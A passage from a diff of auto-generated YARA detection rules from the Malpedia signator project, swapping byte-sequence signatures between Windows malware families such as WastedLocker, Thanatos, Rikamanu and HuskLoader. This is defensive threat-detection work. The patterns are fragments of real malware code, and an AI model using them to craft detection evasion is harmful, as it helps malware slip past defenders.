"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.seduploader_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "f3876fe06c43f4da1aa2e85c3923ddbcdfed237d9e82449557581810436fb80c" + logic_hash = "59b0ef9c5ade0664bc2e5b83dd5075b45d913aac7ac67fc4cf5358fb404425b7" score = 75 quality = 75 tags = "FILE" @@ -132385,34 +135020,34 @@ rule MALPEDIA_Win_Wastedlocker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8bf0 ff7508 6a00 ff35???????? ff15???????? 5f } - $sequence_1 = { 8945e4 8d45dc 50 c745dc18000000 897de0 } - $sequence_2 = { 50 e8???????? 83c40c 56 8d85c8f1ffff 53 50 } - $sequence_3 = { ffd3 8bf8 85ff 7419 6a20 57 ffd3 } - $sequence_4 = { 8d45ec 50 8d45d4 50 6816011200 } - $sequence_5 = { 3b45d0 0f8382000000 894dd8 394de0 740b 0fb703 034710 } - $sequence_6 = { ff35???????? ff15???????? 5f ff75f8 ff15???????? } - $sequence_7 = { 6a00 ff35???????? ff15???????? 8bd8 85db 7469 8b450c } - $sequence_8 = { 2500f0ffff 56 0500100000 50 56 b812345607 } - $sequence_9 = { bf04010000 ffd3 8bf0 85f6 746a 57 56 } + $sequence_0 = { 50 ff7630 e8???????? 83c40c 3b4508 } + $sequence_1 = { c6411001 c3 55 8bec } + $sequence_2 = { 8b4510 83c6fe 8930 8d4601 } + $sequence_3 = { 8b4510 83c6fe 8930 8d4601 50 e8???????? } + $sequence_4 = { 5e c3 55 8bec e8???????? 8b4d0c } + $sequence_5 = { 8b4510 83c6fe 8930 8d4601 50 } + $sequence_6 = { e8???????? 8b4510 83c6fe 8930 } + $sequence_7 = { ff763c e8???????? 83c40c 3b4508 } + $sequence_8 = { ff7630 e8???????? 83c40c 3b4508 } + $sequence_9 = { 50 e8???????? 8b4510 83c6fe 8930 8d4601 50 } condition: - 7 of them and filesize <147456 + 7 of them and filesize <401408 } -rule MALPEDIA_Win_Starcruft_Auto : FILE +rule MALPEDIA_Win_Rikamanu_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1dcafb43-c4d2-514a-8438-617d875e41e7" + id = "08f5de79-f86c-592e-8a15-71782197d327" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.starcruft_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rikamanu_auto.yar#L1-L297" license_url = "N/A" - logic_hash = "ba9170fb6918e14feeea6fab09146b237b88c2d2d12a4f68164b770922d2ddd1" + logic_hash = "3cf2bc6d93646710c8204bdc714006eac60fd0ca80947c5c7ae6ad8dcd343296" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -132424,32 +135059,52 @@ rule MALPEDIA_Win_Starcruft_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83bd34fbffff00 7458 0fb64d34 85c9 7419 8b95b4fcffff 899558fbffff } - $sequence_1 = { ebbd c7852cfeffff01000000 83bd2cfeffff00 7565 8b4508 898524feffff c78520feffff00000000 } - $sequence_2 = { 884def 8b55f0 83c202 8955f0 8b45f0 8945f8 eb09 } - $sequence_3 = { 8b55f8 8b85ccfeffff 8b0c90 0fb711 85d2 740b 8b45f8 } - $sequence_4 = { 55 8bec 81ec20010000 a1???????? 33c5 8945e4 8b4508 } - $sequence_5 = { c685cafcffff26 c685cbfcffffa1 c685ccfcffff8b c685cdfcffff52 c685cefcffff6c c685cffcffffba c685d0fcffffde } - $sequence_6 = { 8b4dd4 8908 8b5510 8b02 50 8d4dd8 51 } - $sequence_7 = { 8b4dcc 51 e8???????? 83c404 8945f0 8955f4 8b55d0 } - $sequence_8 = { e8???????? 83c404 33c0 e9???????? 8b45fc } - $sequence_9 = { e8???????? e8???????? c705????????04c02e00 c705????????08c02e00 c705????????0cc12e00 c705????????10c12e00 } + $sequence_0 = { e8???????? 6a14 ff15???????? a801 } + $sequence_1 = { 50 ff15???????? 8b35???????? 3d80969800 } + $sequence_2 = { 8b85e4fdffff 8d8dccfdffff 51 8d9588fdffff 52 8b95f0fdffff 53 } + $sequence_3 = { 68???????? 51 c744241c6c714000 e8???????? 33d2 6a0c 8954240a } + $sequence_4 = { 0fb6442404 8a4c240c 848821ae4000 751c 837c240800 740e 0fb70445faa64000 } + $sequence_5 = { 83c42c 5f eb26 8d4508 8db62c724000 6a00 } + $sequence_6 = { 8088????????10 8ac8 80c120 888820ad4000 eb1f 83f861 } + $sequence_7 = { 0fbe05???????? 83e802 7413 83e806 7407 bf???????? eb0c } + $sequence_8 = { 57 ff15???????? 33c0 40 ebcc } + $sequence_9 = { eba1 8b85f0fdffff 6a04 8d95ecfdffff } + $sequence_10 = { 51 68???????? 55 ffd3 bf???????? 83c9ff 33c0 } + $sequence_11 = { 6a04 55 83e103 6a01 8d44246c } + $sequence_12 = { 6a00 6a00 55 ffd7 55 } + $sequence_13 = { 56 ff15???????? 8b842470020000 03f8 57 56 ff15???????? } + $sequence_14 = { 8987709a2400 83c704 83ff28 72e6 5f } + $sequence_15 = { 83c40c 33c0 6808020000 8d95f4fdffff 52 } + $sequence_16 = { 8d34c570902400 833e00 7513 50 } + $sequence_17 = { 8d4508 8db62c724000 6a00 50 ff36 e8???????? 59 } + $sequence_18 = { 891d???????? 891d???????? ff15???????? 8d85f8feffff } + $sequence_19 = { 7373 8bc8 8bf0 c1f905 83e61f 8d3c8de0b84000 c1e603 } + $sequence_20 = { 391d???????? 0f849e000000 33c0 663bcb 0f95c0 } + $sequence_21 = { 8bec 8b450c 56 beff000000 3bc6 7518 } + $sequence_22 = { 8945e4 3d00010000 7d10 8a8c181d010000 888808972400 40 ebe6 } + $sequence_23 = { 85c0 74c9 33c9 33c0 890d???????? bf???????? 890d???????? } + $sequence_24 = { ebe3 80a0a0a6400000 40 41 41 3bc6 } + $sequence_25 = { ff15???????? ff750c e8???????? 59 3bc3 } + $sequence_26 = { 40 3acb 75f9 2bc2 8d95f8feffff } + $sequence_27 = { 8b54240c 81fa80000000 7c0e 0fba25????????01 0f820b070000 57 } + $sequence_28 = { 7457 68???????? 56 ffd5 85c0 744b 8a0e } + $sequence_29 = { c1e106 8b0485383f4100 f644080401 7405 8b0408 5d } condition: - 7 of them and filesize <294912 + 7 of them and filesize <212992 } -rule MALPEDIA_Win_Comlook_Auto : FILE +rule MALPEDIA_Win_Unidentified_081_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "860e6423-7c42-5b7a-b226-a660c40ee352" + id = "4bef4e35-3450-5f50-98ad-424279417112" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.comlook" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.comlook_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_081" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_081_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "4752c20623b9cb3b21f01ebe269fa3b02a3d0ecab0d63ba89a5af7bf48ed8b4a" + logic_hash = "0bf113d92abe743278ae5a94b3d8f7a48f5ba7f91d2e79f1d3ac361b6c786f4e" score = 75 quality = 75 tags = "FILE" @@ -132463,32 +135118,32 @@ rule MALPEDIA_Win_Comlook_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c1ff1f 03c1 13d7 2b442434 b900000000 1bd1 33ff } - $sequence_1 = { e8???????? 8d45e0 50 c645fc02 e8???????? 83c42c 8bd8 } - $sequence_2 = { ff15???????? 83c404 3bf4 e8???????? b843000000 e9???????? c7854cffffff00000000 } - $sequence_3 = { e8???????? 8b4e08 80791500 7579 8b01 80781401 7509 } - $sequence_4 = { c1ed08 036e04 25ff000000 036c2414 8906 8b0f 0fb6c0 } - $sequence_5 = { e9???????? 8b4518 0b451c 7509 33c0 33d2 e9???????? } - $sequence_6 = { e8???????? 83c408 85c0 7410 8b4508 8b4df8 894858 } - $sequence_7 = { e8???????? 8bf8 83c404 3bfb 0f8eab060000 c7463460210000 895e44 } - $sequence_8 = { e8???????? a1???????? 33c4 89442418 53 8b5c2424 8b435c } - $sequence_9 = { b8cccccccc 8945f0 8945f4 8945f8 8945fc 8b4508 0590050000 } + $sequence_0 = { 8985c8fdffff 83f808 0f84ab090000 83f807 0f8777090000 ff24854fa44000 33c0 } + $sequence_1 = { c74518f0944100 50 8d4dc4 e8???????? 68???????? 8d45c4 } + $sequence_2 = { 68???????? b9???????? e8???????? c645fc03 33c0 } + $sequence_3 = { eb02 33c0 8bbdc8fdffff 6bc009 0fb6bc38e8544100 8bc7 89bdc8fdffff } + $sequence_4 = { 8b7508 c7465c48554100 83660800 33ff } + $sequence_5 = { c645fc01 33c9 66a3???????? 66390d???????? 8bc6 c705????????07000000 0f44c1 } + $sequence_6 = { 88440a34 8b049dd0d14100 c744023801000000 e9???????? ff15???????? 8bf8 } + $sequence_7 = { 83e61f c1f805 c1e606 8b0485d0d14100 80643004fd 8b45f8 } + $sequence_8 = { 6a01 6a00 f7d8 50 53 ff15???????? 8b8d34ffffff } + $sequence_9 = { ff15???????? 837c241001 7507 b101 e8???????? 8b35???????? } condition: - 7 of them and filesize <4553728 + 7 of them and filesize <273408 } -rule MALPEDIA_Win_Thanatos_Auto : FILE +rule MALPEDIA_Win_Rc2Fm_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3d56c6ff-7a5f-5548-8f3b-06d8d6158f7b" + id = "e4f1d324-0720-53a3-a9da-cb15ebd44ad4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.thanatos_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rc2fm_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "2cc3d4fef37b3d57358c4e21f8e34a4b374cac5e972e715588051a429530df72" + logic_hash = "2b4b23efded831a0bcad4decee49c98aca63a9f5af170fcd017bff9b432b8451" score = 75 quality = 75 tags = "FILE" @@ -132502,32 +135157,32 @@ rule MALPEDIA_Win_Thanatos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85f6 0f849b010000 ff742428 6a00 68ffff1f00 ff15???????? 8bf8 } - $sequence_1 = { 50 8bda 8bf1 c78560ffffff94000000 e8???????? 83c40c 8d8560ffffff } - $sequence_2 = { c64435bc46 8d45bc 50 46 ffd7 3bf0 7ce9 } - $sequence_3 = { 6a00 6a00 68000000c0 68???????? 46 ffd3 8bf8 } - $sequence_4 = { 83c40c 807d0800 7459 8b4c240c 897c2422 8d4306 8944241e } - $sequence_5 = { 807d0800 89442414 b80a000000 7524 3bdf } - $sequence_6 = { 84c0 75f9 2bd7 5f 7409 51 ff15???????? } - $sequence_7 = { 57 8bf9 8b4e28 8955fc 83f803 0f85e5020000 8b5d08 } - $sequence_8 = { 893d???????? c705????????ecb40110 f30f7e05???????? 660fd64008 } - $sequence_9 = { 50 6a02 ff15???????? 8b7514 c705????????c0b30110 85f6 0f8486010000 } + $sequence_0 = { 48894c2408 55 57 4154 4156 488d6c24c1 4881ecb8000000 } + $sequence_1 = { 4883ec20 498bf1 4d8bf0 4c8bfa 488bd9 ff15???????? } + $sequence_2 = { 415c 5f 5b c3 488b09 4889ac2480000000 } + $sequence_3 = { b001 eb14 448bc3 ba00000500 b91b000100 e8???????? } + $sequence_4 = { 488b4808 4c897d00 4c89742460 48894df8 8d4e14 e8???????? 6690 } + $sequence_5 = { 448bc0 e8???????? eb0f ba0a000b00 b911000100 e8???????? 488b0d???????? } + $sequence_6 = { 0fb68c28304c0200 eb0c 48c1e807 0fb68c28304d0200 4863c1 448bd7 66ff8483b0090000 } + $sequence_7 = { 88040a ff4328 8b5328 0fb64745 488b4b10 88040a ff4328 } + $sequence_8 = { 83b98804000000 488bd9 7431 ff8b88040000 8b8388040000 4c8b84c360040000 4d85c0 } + $sequence_9 = { 0f8781010000 83fd09 0f8778010000 448b642478 4183fc04 0f8769010000 488b4938 } condition: - 7 of them and filesize <1810432 + 7 of them and filesize <410624 } -rule MALPEDIA_Win_Vermilion_Strike_Auto : FILE +rule MALPEDIA_Win_Rincux_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cba78739-b046-53e4-ac8a-fb7e1edf89cf" + id = "f27efa3f-a583-5935-b25f-3d309003cd7f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermilion_strike" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vermilion_strike_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rincux_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "1312a531701a8eef40faaee34110290f7221a3999f3d5685ddec7e08b4b4a11d" + logic_hash = "bab1d2c8fa3084a76a95e14132fec6ddc959ff0aa0d14a5e81e01f5b29b7ad34" score = 75 quality = 75 tags = "FILE" @@ -132541,32 +135196,32 @@ rule MALPEDIA_Win_Vermilion_Strike_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f8e3f010000 56 55 8d442444 e8???????? 85ff 751b } - $sequence_1 = { ff15???????? 8bf7 e8???????? 8b15???????? 6a00 6a01 } - $sequence_2 = { 51 8d4601 e8???????? 6a30 53 8bc6 8d7c2444 } - $sequence_3 = { 8bd8 8beb 897c2418 85c0 7517 e8???????? 33c0 } - $sequence_4 = { 6a00 6a00 6a03 6a00 6a00 50 53 } - $sequence_5 = { 83c8ff 8bf7 c744244802000000 e8???????? 885c2440 396c2428 720d } - $sequence_6 = { 83c004 395e18 7205 8b7604 eb03 83c604 8b3d???????? } - $sequence_7 = { 8bc1 57 c746180f000000 c7461400000000 c744240400000000 c6460400 } - $sequence_8 = { 6a02 8bc3 7413 68???????? e8???????? 6a02 68???????? } - $sequence_9 = { 3bc5 7405 e8???????? 2bdf 8b542424 52 } + $sequence_0 = { 742d b9fa000000 33c0 8dbc24c0000000 8d9424c0000000 f3ab 8d8c24b0000000 } + $sequence_1 = { 8bcd 52 57 e8???????? 8b442410 8d4c2424 6a04 } + $sequence_2 = { 7425 8b442410 8d4c2424 88442424 } + $sequence_3 = { c68424fd00000076 888c24fe000000 888424ff000000 c68424000100005c c684240101000052 c684240201000044 c684240301000050 } + $sequence_4 = { c20800 33c0 8a4701 894614 8b4df4 64890d00000000 } + $sequence_5 = { ff15???????? 83f8ff 7511 8b16 52 ff15???????? 5f } + $sequence_6 = { 5e 83c42c c20400 8b542438 8d4c2408 51 52 } + $sequence_7 = { 84c0 74d8 5f 5e 5d 5b } + $sequence_8 = { 53 57 8b7c242c 6683f90e 7502 } + $sequence_9 = { 50 68???????? e9???????? 40 c745fc00000000 50 e8???????? } condition: - 7 of them and filesize <540672 + 7 of them and filesize <392192 } -rule MALPEDIA_Win_Bootwreck_Auto : FILE +rule MALPEDIA_Win_Cinobi_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7e23b82b-3bdc-58cd-906f-3ab5825b9ffb" + id = "853d9242-221d-59c1-ad19-29eb6c5779a8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bootwreck_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cinobi_auto.yar#L1-L162" license_url = "N/A" - logic_hash = "49dbec8ae0163fe1b10f7b427af3210b6bbd81884139d209319f2b77e78ba995" + logic_hash = "57c1141de6150455825b72381295eb849d072a659e2915f93f96811cd61f7768" score = 75 quality = 75 tags = "FILE" @@ -132580,32 +135235,37 @@ rule MALPEDIA_Win_Bootwreck_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33ff 897dfc 3b1cfde0c18100 7409 47 897dfc } - $sequence_1 = { 8d642428 0f8409000000 660fbec2 86c7 8b4510 55 660fb6da } - $sequence_2 = { 85b178373e03 025ad9 7efa 99 18c7 7e55 } - $sequence_3 = { c74424147d978300 682dedfcaa 9c 89442418 9c 9c ff742420 } - $sequence_4 = { ee 5b 7f3f 99 68e43b3fa7 6c } - $sequence_5 = { 876c2428 66891c24 688106ab60 896c2428 5d 66896c2404 bd???????? } - $sequence_6 = { 8955fc f9 8d9b00000000 30e1 37 d4b7 8b4d08 } - $sequence_7 = { ff4638 88c3 66f7d6 b37c 5b 660fb6f9 5f } - $sequence_8 = { c25400 c7042400000000 60 8774241c 8d64241c 0f8103500500 } - $sequence_9 = { 8d041f f7c5036c87b2 99 84ed f8 60 6681fb744d } + $sequence_0 = { c9 c3 55 8bec 51 e8???????? 58 } + $sequence_1 = { 8845df 8b45bc 8a400c 8845e0 } + $sequence_2 = { 0f8554010000 6a04 58 8b4df4 } + $sequence_3 = { 33c0 66898588faffff 8b85a8faffff 660fbe4008 66898584f5ffff 8b85a8faffff 660fbe4020 } + $sequence_4 = { e8???????? 59 59 84c0 751e 6810270000 } + $sequence_5 = { 8a4642 88842456010000 8a4647 88842457010000 8a4646 88842458010000 } + $sequence_6 = { 8b45f8 8b75f4 83c0f0 50 } + $sequence_7 = { ff705f 8b45c0 ffb0b7000000 ff75dc } + $sequence_8 = { 8b45c0 ff705f 8b45c0 ffb09f000000 ff75dc e8???????? 83c40c } + $sequence_9 = { 2402 88460e b001 5f 5b } + $sequence_10 = { 6880000000 ff7508 8b45f8 ff5073 ff7508 8b45f8 } + $sequence_11 = { 8b45bc 8a4053 8845f7 8b45bc 8a400c 8845f8 } + $sequence_12 = { 57 6800100000 ff75f8 ff75f0 ff9303010000 } + $sequence_13 = { 885de0 8a5823 884de9 8a4839 885de1 8a581d 884dea } + $sequence_14 = { 8b85a8faffff 660fbe4003 668945ba 8b85a8faffff 660fbe4013 } condition: - 7 of them and filesize <10821632 + 7 of them and filesize <32768 } -rule MALPEDIA_Win_Windealer_Auto : FILE +rule MALPEDIA_Win_Huskloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f3b71a3e-a02a-5dce-bc43-cb374750ce4e" + id = "2b71c66f-6603-595c-99bb-89c942583260" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.windealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.windealer_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.huskloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.huskloader_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "d82b81175389182c804642799536612f0047302d818841ec0b2b4fd9f2036f88" + logic_hash = "0b5c5ed5027920c73090f364afb1f0be41c97145cf9de72e357bac2712d50fca" score = 75 quality = 75 tags = "FILE" @@ -132619,32 +135279,32 @@ rule MALPEDIA_Win_Windealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 56 e8???????? 83c410 8b4618 } - $sequence_1 = { 6a00 ff15???????? 85c0 7407 50 ff15???????? 6a01 } - $sequence_2 = { 6a04 50 6a04 68???????? 68???????? } - $sequence_3 = { 50 56 e8???????? 83c410 8b4610 } - $sequence_4 = { 53 56 57 68da070000 } - $sequence_5 = { 56 57 68da070000 e8???????? } - $sequence_6 = { 56 e8???????? 83c410 8b4610 } - $sequence_7 = { 6a01 50 56 e8???????? 83c410 8bc7 } - $sequence_8 = { 668b91d2070000 8a89d0070000 52 51 } - $sequence_9 = { 8b4d08 668b91d2070000 8a89d0070000 52 51 } + $sequence_0 = { 8bc7 83e03f 6bc838 8b0495e88d0110 } + $sequence_1 = { 59 e9???????? c745e003000000 e9???????? c745e4c05e0110 ebb8 d9e8 } + $sequence_2 = { 6a00 681f000f00 50 ff15???????? 85c0 } + $sequence_3 = { 740e 50 e8???????? 83a6e88d011000 59 83c604 81fe00020000 } + $sequence_4 = { 8d043b 8b3485601f0110 8d4601 8945fc 8a06 46 } + $sequence_5 = { 57 8bb81c060000 6a40 6800300000 56 6a00 ff15???????? } + $sequence_6 = { 85c0 7411 8b35???????? b98b010000 } + $sequence_7 = { 7420 6bc618 57 8db8288c0110 57 ff15???????? } + $sequence_8 = { 8b35???????? 85f6 7420 6bc618 57 8db8288c0110 57 } + $sequence_9 = { 0fb704850c3b0110 8d048508320110 50 8d8590faffff 03c7 50 } condition: - 7 of them and filesize <770048 + 7 of them and filesize <229376 } -rule MALPEDIA_Win_Xbot_Pos_Auto : FILE +rule MALPEDIA_Win_Mimic_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4fe5918d-28da-56d9-a11a-0daee8e0859e" + id = "868573b4-62fd-5cb9-b5b2-294037fc58d9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xbot_pos_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimic" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mimic_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "ca7b720c096face03c032566840e8484d5e37cc5bc6f6baf53fbffd9b36ce27d" + logic_hash = "254f11d4299c867206c2f429f422756a353d8d6c35de138faa70cb17074bdf11" score = 75 quality = 75 tags = "FILE" @@ -132658,32 +135318,32 @@ rule MALPEDIA_Win_Xbot_Pos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b8d50fcffff 8d148d34935500 899558fcffff 8d8d2cfeffff e8???????? 8b8558fcffff 0fb64803 } - $sequence_1 = { 46 4c 002c46 4c } - $sequence_2 = { 83e23f 6bc230 8b0c8de0465600 8b540118 8955f4 837df4ff 7412 } - $sequence_3 = { 8d8d74fcffff e8???????? eb1f 6a00 8d8560fcffff 50 8d8decfeffff } - $sequence_4 = { 8b4d08 51 8b4df8 e8???????? 8bf0 8b4df8 } - $sequence_5 = { 837d1800 740c c785d8deffffe8905400 eb0a c785d8deffff88905400 8b85a8deffff 50 } - $sequence_6 = { f3ab 0fb64508 85c0 741b 837d0c00 7515 8b4514 } - $sequence_7 = { 8b00 50 8b4df8 e8???????? 8b08 51 8b4df8 } - $sequence_8 = { 85db 7552 68???????? 68???????? 56 6a41 68???????? } - $sequence_9 = { 8b4508 8b0c853c255600 51 ff15???????? 8b5508 } + $sequence_0 = { 7f4a 7c05 3945e0 7343 8b55dc 83fa08 0f82b4000000 } + $sequence_1 = { 81fe2c010000 7f1d 68e8030000 ffd7 ffd3 85c0 74dd } + $sequence_2 = { 837db810 51 0f4345a4 8d4d84 03c2 50 e8???????? } + $sequence_3 = { a3???????? 8b8548feffff 894804 8d8d30feffff e8???????? 6a20 ffb530feffff } + $sequence_4 = { 0f43c2 0f43da 8d0470 8db5ccfdffff 8bc8 0f43f2 33ff } + $sequence_5 = { 42 41 3bd6 7cf4 3bd6 751f 6a61 } + $sequence_6 = { c745fc02000000 a801 743a 83e0fe 894584 83ff08 } + $sequence_7 = { 50 ffd6 68???????? c645fc40 e8???????? } + $sequence_8 = { 8d8d18ffffff e9???????? 8d4dc0 e9???????? 8d4dd8 e9???????? 8b542408 } + $sequence_9 = { 8b483c 898424e4000000 89ac24e0000000 894c2438 0f1f4000 0f1f840000000000 8bb424fc010000 } condition: - 7 of them and filesize <3031040 + 7 of them and filesize <4204544 } -rule MALPEDIA_Win_Powersniff_Auto : FILE +rule MALPEDIA_Win_Mofksys_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1afa4094-a9fd-5e6f-8667-60dff005c0b1" + id = "d4eb461a-0f9d-55f8-ba8b-2ce33ab04b0d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.powersniff_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mofksys_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "7ad286ca27751eb193f2579d1930e5287fef0e22f2b28df0af9c7874b91d42c3" + logic_hash = "79cea3cada5c4d8bb821159689e5cf75c88595dc32d8f5768a4b2ed694d76584" score = 75 quality = 75 tags = "FILE" @@ -132697,32 +135357,32 @@ rule MALPEDIA_Win_Powersniff_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 ff35???????? 8945f8 895dfc } - $sequence_1 = { 8b45f4 b94d5a0000 663908 7405 6a0b 5b eb0f } - $sequence_2 = { 53 56 8b35???????? 57 8d85d8fdffff 50 33db } - $sequence_3 = { c1eb10 8975fc 8b75f8 c1ee18 8b34b590780010 0fb6db } - $sequence_4 = { 50 8d45f8 50 ff75fc e8???????? 8bd8 3bde } - $sequence_5 = { c745fc08000000 eb09 ff15???????? 8945fc 8b45fc 5f 5e } - $sequence_6 = { ff15???????? 8bf8 897df0 3bfb 7435 8d4508 50 } - $sequence_7 = { 55 8bec 83ec0c 8b473c 03c7 53 8b9880000000 } - $sequence_8 = { ff15???????? 85c0 0f84b4000000 8d8590feffff 50 ffd3 034574 } - $sequence_9 = { a1???????? 53 68???????? ff750c 8945f8 ff7508 } + $sequence_0 = { 50 e8???????? 8bd0 8d4de8 ffd6 8d8d60ffffff } + $sequence_1 = { 894dd4 c745fc07000000 8b55d8 52 e8???????? ff15???????? 8b45d4 } + $sequence_2 = { 83c40c c745fca1000000 ba???????? 8d4dc0 ff15???????? 8d4dc0 51 } + $sequence_3 = { f7de 3bf0 7209 ff15???????? 8b4dc0 8b4118 0fafc6 } + $sequence_4 = { ff15???????? 83c410 c745fc65000000 ba???????? 8d4dcc ff15???????? a1???????? } + $sequence_5 = { ff15???????? 8bd0 8d8d7cfcffff ffd6 50 ffd7 } + $sequence_6 = { a1???????? 8b4de4 50 51 ffd7 8bd0 8d4da8 } + $sequence_7 = { 3bc3 7d12 68e0000000 68???????? 56 50 } + $sequence_8 = { 83c201 0f80b2080000 52 8b45d0 50 68???????? } + $sequence_9 = { e8???????? 8d4ddc ff15???????? c745fc0f000000 68???????? 6a00 ff15???????? } condition: - 7 of them and filesize <90112 + 7 of them and filesize <401408 } -rule MALPEDIA_Win_Dratzarus_Auto : FILE +rule MALPEDIA_Win_Unidentified_023_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3e7875e3-7e0c-5dea-9e90-8b6135466b8c" + id = "f77c5286-0b1f-561f-8f58-a27a0408436a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dratzarus_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_023_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "5f92bffb1ff676600291544ee9f45d8f2036c734b0601a5e03b740f618ff0f21" + logic_hash = "1eec10f2afa6bd7e6a1d69558f2f25a771bedb385bd839fc0b4d5b578eec4086" score = 75 quality = 75 tags = "FILE" @@ -132736,32 +135396,32 @@ rule MALPEDIA_Win_Dratzarus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 740a 488b1b 4885db 75c2 eb2f 8b8398010000 } - $sequence_1 = { f6c201 7403 66ffc3 66ffc0 6683f81a } - $sequence_2 = { e8???????? f20f5ef0 f20f1005???????? f20f2cd6 660f6eca 4863c2 488d0c40 } - $sequence_3 = { ff15???????? 488d4d68 ba13000000 488905???????? e8???????? } - $sequence_4 = { 